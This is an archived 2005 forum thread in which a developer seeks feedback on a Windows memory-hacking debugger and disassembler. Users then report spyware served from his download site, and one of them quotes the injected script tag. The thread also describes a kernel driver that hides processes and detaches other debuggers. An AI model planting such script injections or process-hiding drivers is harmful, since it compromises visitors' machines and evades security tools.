View Full Version : Memory Hacking Software 2.0.4.7
L. Spiro
August 26th, 2005, 14:07
I would appreciate input on this project.
I am quite dedicated to it and I would like to have input from experienced others on what could be upgraded/added/modified.
I know that currently it is missing some obvious features, such as Copy in the Disassembler, but these are details I just have to get around to doing.
Aside from the minor details, what actual features could be added to improve this software?
It can be found here
http://www.gwforum.ca/l-spiro/ (NOTE: Some people have experienced problems visiting this page. Seems there is a risk that the site has been hacked? For that reason, I am posting a direct link to the software. Hopefully there are no problems with this link.)
Direct link to the package: http://www.gwforum.ca/l-spiro/MemHack/MemHack%202.0.5.1.zip (it works now).
I am mostly interested in what can be improved on the debugger/disassembler.
I will give a brief overview of the current features related to these two areas.
Debugger:
Software Read/Write/Access/Execute breakpoints.
Hardware Write/Access/Execute breakpoints.
Conditional Breakpoints: Create conditions using a simple wizard. You can compound any number of conditions together on a breakpoint (&& and || operators) and use parentheses to denote precedence. Operands can be hit count, specific value (example: 56), registers (example: EBX), registers as addresses (example: [EBP]), and addresses (example [0x124EFC]). more conditions can be added via DLL plug-ins.
Assignable Functions to Breakpoints: Breakpoints do whatever you want, from loading the Disassembler to printing a message. If you need more functions, you can create a DLL plug-in. You can assign 3 functions (both built-in functions and your own custom plug-in functions) to any breakpoint in any order and combination.
Saving Breakpoints: You can save your breakpoints and load them later. All saves are relative to the base DLL address, so if the DLL moves, the breakpoint will still be loaded to the correct location.
Disassembler:
Decodes Addresses: Addresses can be assigned any type, including classes, structures, and typedefs (the Template Editor allows you to define these). When assigned, they will be decoded depending on their type. If an address is decoded into a structure or class, each member of the structure/class will be shown by name and value, using the same style as is used in Visual Studio.
Single-Step, Step Over and Step Out (pRET).
Comments: Add your own comments to addresses to leave yourself notes.
NOP: NOP’ing is remembered and the pop-up menu allows you to undo NOP’ing quickly.
Highlights: Jumps, calls, and various other tidbits are highlighted for ease in viewing. See Picture #1.
Import Functions: The Template Importer allows you to scan header files for function definitions which the Disassembler can use to display more detailed information about functions. My database is currently at 34,922 functions complete with full parameter names and types, created from scanning Windows® header files.
Map Locals and Parameters: Memory Hacking Software is able to determine function parameters and locals for unknown functions and then map them over RAM while in single-stepping mode. As they are accessed, they are shown in color so you can see them easily. Locals are in green and parameters are in purple. See Picture #2 and Picture #3.
Visual Appearance: Well I am still working on this but so far you can change to any font you want and change the colors. You can also change the output from the Disassembler in a variety of ways.
Picture #1 - http://www.gwforum.ca/l-spiro/HiLightJumps.gif
Picture #2 - http://www.gwforum.ca/l-spiro/MappedParams.gif
Picture #3 - http://www.gwforum.ca/l-spiro/InsideFunction.png
Again, any feedback is appreciated.
L. Spiro
Kayaker
August 26th, 2005, 14:35
Hi, I edited your links so they displayed properly (external clickable links aren't supported)
Kayaker
SiGiNT
August 26th, 2005, 15:23
I don't know what's up with this!, but the links to the graphic files are fine - going to the main page - Norton has a heart attack! blocking - deleting several "virii" - use caution.
SiGiNT
L. Spiro
August 26th, 2005, 22:17
Quote:
Hi, I edited your links so they displayed properly (external clickable links aren't supported) |
I see.
Thank you for that.
Quote:
I don't know what's up with this!, but the links to the graphic files are fine - going to the main page - Norton has a heart attack! blocking - deleting several "virii" - use caution. |
Well there aren’t any actual viruses on the page or in the software, but one of its other features is to hide from the process list.
To accomplish this, I use a system driver which anti-virus software tag as having a root-kit trojan.
This feature is not required to run Memory Hacking Software, so if your anti-virus tags it and deletes it, it is okay.
The only time it is loaded it when it hides itself or when it knocks another debugger off the target software (if it is already being debugged).
dbk32.sys is the device driver that performs these operations and dbk32.dll is a wrapper for the driver. If you (or your software) delete dbk32.sys, you must also delete dbk32.dll.
L. Spiro
SiGiNT
August 27th, 2005, 01:54
I didn't download the software, the problems with Norton were simply from visiting the page, and what's with the message box filled with gibberish and an ok button that will not close - (no I didn't click the button) - shut down the IE process independently - don't know about anyone else but unless there are any other reports, from someone I know, that this site is safe - I'm not going there.
SiGiNT
L. Spiro
August 27th, 2005, 02:18
That is odd to say the least.
I have never heard of this happening to anyone else.
The site is fine; there are no pop-ups or viruses on it.
Unless it’s been hacked.
But it still works fine for me and some others, so that isn’t a possibility.
Pop-ups are lame so I don’t use them.
If you are getting one, it would definitely be something on your end acting up.
It is understandable to have many anti-virus software installed and blockers/ad-removals when you frequent this type of board and engage in this type of activity, but unfortunately these types of software are known for misbehaving and calling false alarms.
Of course, a message box filled with gibberish is new to me.
I suspect it means you already have some kind of trojan/virus.
Anyway, I am not suggesting you take my word for it.
We will wait until others go there and report back.
I’ve already added a few more options but not enough to warrent its own release.
I work on this night and day, and any input on making it better will be appreciated.
L. Spiro
Knight
August 27th, 2005, 04:39
For me both sites works fine, without a single pop-up.
Sigint, in Syser Debuger thread u said that it made u some problems. Maybe these things are related and maybe problem is not in Spiro site and not in Syser, but like Spiro already said u already have trojan/virus/adware/etc.
Regards
andrewg
August 27th, 2005, 08:11
Some software will automatically download other pages, in an effort to speed up downloads; prehaps this is what triggered the AV alarm. Granted, without knowing what browser and plugins / additions you're using its hard to make that call.
blabberer
August 27th, 2005, 08:40
Quote:
Map Locals and Parameters
|
hey how are you accomplishing this are you pulling the pdbs or have an internal database for all those structs
labelling locals means i have some software where i have my own structs
like
typedef struct _MY_STRUCT {
ulong blah;
ushort blah1;
wchar balh2;
longlong blah3;
}MY_STRUCT ,*PMY_STRUCT;
LOCAL mystru:MY_STRUCT;
call mycall(&mystru,blah4,MY_USELESS_CONSTANT)
will it be able to label this mystru or some kind of same locals and args
also does it label them inside the disassembly or shows tham as comments ??
i saw the screenhsot it seems it shows them as comments
or for example
is source available or will it be made available
hope to test it some time soon

thanks and regards
L. Spiro
August 27th, 2005, 09:08
It can create an internal database for you.
You can scan header files to get function definitions and structures/classes.
It stores all the information and when a function is discovered with a known name it counts the parameters in that function.
Then it determines if, by name and parameter count, it can get a match from the database of functions.
If it gets a match, it applies the known parameter names and types to the function it discovered.
Then it goes on to count the locals.
It does not in any way store any database of known function locals because it is up to the compiler how to spread the locals over a function’s local stack, so it can not be predicted.
Instead, it scans the disassembly for them and logs what it finds.
For each local, a type and name is supplied. It takes a guess to determine what type the locals are.
All this information is then stored and attached to that function, which, when called or referenced, will be shown as a comment as you see in the pictures.
After that, you can right-click the function in the output and modify anything you like.
You can rename the function, locals, and parameters, and reassign them types.
Regarding types: When it scans a file and extracts a structure or class, it preserves the basic data types and name and aligns them correctly so that they can be mapped over RAM how the real structure/class would be mapped over RAM.
This allows it to simply lay a struct/class over the RAM and then print the address, type, name, and value of each item in the struct/class.
You can also define typedefs and assign them to locals and parameters.
Regarding the extraction: It scans header/code files in almost the same way as when your compiler checks the code. It stores macros created with #define and parses #if, #ifdef, #ifndef, etc., statements correctly. It generates a preprocessed file.
Then it scans that file, keeping track of typedefs, and imports all the functions/structs/classes.
Using your struct as an example, it will be able to resolve “ulong” into “unsigned long”, and the others will be resolved to their respective types.
Then it will store the typedefs of that struct, and when other structs/classes/functions use that struct by its typedef name, it will be resolved to either “_MY_STRUCT” or “_MY_STRUCT *”, depending on which typedef is used.
If it is a function that uses a “PMY_STRUCT” as a parameter, it will keep the typedef name “PMY_STRUCT” and resolve to the correct struct and pointer depth when mapping over RAM for use in displaying locals and parameters.
If you want to create your own database, go to Tools/Template Editor, and hit Import, and check the “Header Files” check. You will need to set the #include paths and it is recommended that you add a few of the basic Windows® macros such as _MSC_VER, WINVER, _WIN32_WINNT, and _WIN32_WINDOWS.
Remember, it works in the same way as a compiler would, so if you want to use “ulong” as a type, you need to either #define it or typedef it, either directly in your source or in an #include’d header file.
L. Spiro
SiGiNT
August 27th, 2005, 11:28
L Spiro,
I apologize if you think I accused you of directing us to an infected site - and there is a possibility of false positives - hell Norton with the most recent updates labels PeID 0.93 as a Trojan as well as the accompanying plug-ins - apparently it's using "heuristic" detection now - something it has not done in the past - as for problems I thought might related to Syser, I've solved the annoyances that popped-up after uninstallation and now believe my Search Companion problem is probably related to uninstalling the commercial version of RealPlayer - but that would not have had an effect on my experience on the web page as I went to it during lunch at work where I have no RE tools installed or other related utilities - admittedly they recently upgraded our installations of Norton - but that doesn't explain the pop-up - the experience was very similar to visiting some of the more seedy Russian Warez sites. I have a machine here at home dedicated to risky web searching and I'll take another look today as I'm interested in your tool, I'll let you know!
Thanx for your contribution.
SiGiNT
LLXX
August 27th, 2005, 19:12
I can assure you I have visited the site (with a secured IE) and find nothing of concern. It's safe.
evlncrn8
August 27th, 2005, 21:07
yup, site seemed fine for me too using firefox
naides
August 27th, 2005, 21:17
Note:
My firewall, BlackIce gives me a warning "rogue application" when I access http://www.gwforum.ca/l-spiro/ using IE
Netscape or FireFox goes under the radar
SiGiNT
August 27th, 2005, 22:05
One more good reasoin to switch to FireFox or Opera for good - old habits are hard to break - anyway I was at work and don't have a choice - but in support of someone elses point - there is something going on here at home - something I was working on today, a newer version of an old familiar target is giving me odd error messages for no apparent reason - I think I need to do some major repair on my OS here - or finally upgrade to "PRO".
SiGiNT
L. Spiro
August 28th, 2005, 01:49
Memory Hacking Software 2.0.4.8 is up.
A few options added to the Disassembler and a problem was resolved regarding importing structs/classes/functions.
I decided I should get that problem fixed quickly before anyone bumps into it.
Same site: http://www.gwforum.ca/l-spiro/
L. Spiro
goggles99
August 28th, 2005, 17:24
Quote:
[Originally Posted by sigint33]L Spiro,
I apologize if you think I accused you of directing us to an infected site ... |
Don't bother apologizing, It's true, I read your post and decided to check this out. My sandbox (for testing) computer was infected by visiting this site with 2 spy-wares. I was using a patched Internet Explorer and that was the only page that I had open. My cursor changed to an hourglass shortly after the page loaded, then I could hear my hard drive scratching furiously as if something was accessing it. A second later, Zone Alarm started asking about 2 exec files trying to access the internet "msvb_default.exe" which downloads "regscan.exe". Both spy-wares.
Here is what's happening, a java script is dynamically loaded onto the page, but only once per IP address. If you visit the site again, no .JS file. The server is logging your IP and only delivering it once. the .JS file is a random name that is 7 characters long. It is dynamic content and cannot be accesses directly by typing it's URL into your browser.
here is an example (it was inserted above the <head>

<script language=JavaScript src=/xknlbht.js></script>
typing http://www.gwforum.ca/l-spiro/xknlbht.js afterward won't work because the content will be gone. (I captured the JS file via a sniffer, as it didn't seem to cache either)
It obviously is taking advantage of some IE security hole (Got FireFox?). It appears that either Spiro or Kuntor set this up, or the server is hacked. (prob from a phpBB exploit)
The url "trustbid.ws" and "stats4all.ws" are refrenced several times in the JS file. It is possible that the server is hacked.
See here for an explanations:http://forum.ev1servers.net/showthread.php?t=54363
http://www.jregrassroots.org/forums/?showtopic=14401
or Google your own research.
I'm willing to give Spiro the benefit of the doubt for a while...

But get this cleaned up. Maybe you should offer a warning next to your link until this is taken care of, meanwhile your name is being dragged through the mud.
SiGiNT
August 28th, 2005, 18:43
goggles99,
Thanx for the info, I also visited the site yesterday with my minimally protected sacraficial machine, Norton + WINXP SP2 firewall only, I appeared to have no problem, but I did notice that the link info on the bottom bar of IE was blinking furiously, I shrugged it off, explored a bit and shut down. I will scan the machine later. My best guess is that the page is being hacked - maybe by different people at different times - on my machine at work Norton blocked a trojan and deleted another, and there was the message box filled with ahahahahah - and an ok button - I assume the box was supposed to be filled with what represented laughter - I don't think L Spiro would give us a link to his ISP's personal web space page if he was aware that there was malicious content.
SiGiNT
L. Spiro
August 29th, 2005, 00:53
I will direct kunt0r to this information when he comes online next.
I’m still not getting these things.
I searched for both msvb_default.exe and regscan.exe and neither are on my computer, and of course I visit the page frequently.
If there is some kind of problem, it has to be a hack job.
Since kunt0r is running the site, I will have him look into it.
I will post direct links to the software packages.
L. Spiro
kunt0r examined the page and said he could find nothing.
I downloaded every php file from the server and they each matched my own local files, which are definitely clean.
His words:
<kunt0r> spiro
<kunt0r> I checked your site
<kunt0r> doesnt seem like anythings wrong with it
<kunt0r> you might want to download all your php's and read through them to see if anyone added shit
<kunt0r> check every php file, make sure there's no .js files
<kunt0r> dunno if it happened or if that guys just got a fucked up computer
<kunt0r> you can tell them that my site was compromised and someone did mess with my php's and did upload some js's, but I cleaned house and closed the exploit
<kunt0r> and I checked your shit like a week back to make sure no one messed with it as well
<kunt0r> and added that .htaccess to block all scripts
Well I can’t say what has happened before, but I update the main page often, so if some cracker things he is funny by modifying it, his changes would only last about a day.
I have updated the page since these reports first came in, so anything wrong with the pages back then would be lost now, which is of course a good thing, but also makes it very hard to determine if they were indeed modified.
In any case, the direct link is posted so there is no longer a threat of modified php files doing things we don’t want.
L. Spiro
September 6th, 2005, 12:51
Sorry to bump.
Uploading 2.0.5.1 was troublesome; the server kept cutting off the download, creating corrupted .ZIP files. It took several days to get a good copy up, and in that time I am sure some people may have tried to download it, found it corrupt, then forgot about it.
I am just wondering if anyone has any input, since my site’s problems seemed to get everyone sidetracked.
The link is on the main page and here: http://www.gwforum.ca/l-spiro/MemHack/MemHack%202.0.5.1.zip
Again, input is appreciated.
L. Spiro
SiGiNT
September 6th, 2005, 13:42
Thanx!
A direct link to the download solves all the previous problems even if they still exist - my guess is a webcrawler flagged your site as using the word "hacking", and it became fair game for all the pre-pubescent BlackHats out there.
SiGiNT
Fartzalot
September 16th, 2005, 11:24
A message box filled with gibberish?? sounds like windows messenger, the network notification service being hijacked. Turn it off on that PC, except you was at work so you are stuck with it. But check with your sys admin they might let you kill it.
Powered by vBulletin® Version 4.2.2 Copyright © 2018 vBulletin Solutions, Inc. All rights reserved.